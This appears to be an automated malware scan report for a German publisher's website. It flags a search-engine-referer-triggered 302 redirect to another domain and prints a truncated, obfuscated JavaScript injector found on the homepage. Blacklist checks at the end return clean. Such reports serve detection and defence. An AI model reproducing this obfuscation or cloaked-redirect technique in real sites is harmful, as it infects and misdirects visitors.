Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.dreikastanienverlag.de/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.dreikastanienverlag.de Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 22:40:31 GMT Location: http://reddeerhotyoga.ca/aeed.html?h=1013149 Server: Apache/2.2.9 (Debian) DAV/2 mod_ssl/2.2.9 OpenSSL/0.9.8g PHP/5.2.6-1+lenny10 with Suhosin-Patch Vary: Accept-Encoding Content-Length: 228 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.dreikastanienverlag.de/ | 200 OK Content-Length: 4525 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document.body++}catch(dgsgsdg){zxc=12;ww=window;}if(zxc){try{f=document.createElement("div");}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="zxc"}catch(bawetawe){if(ww.document){v=window;n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1f","4j","d","9","9","9","41","3o","4a","3j","45","3n" Antivirus reports:
| ||
http://www.dreikastanienverlag.de/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dreikastanienverlag.de
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://dreikastanienverlag.de/
Result: dreikastanienverlag.de is not infected or malware details are not published yet.
Result: dreikastanienverlag.de is not infected or malware details are not published yet.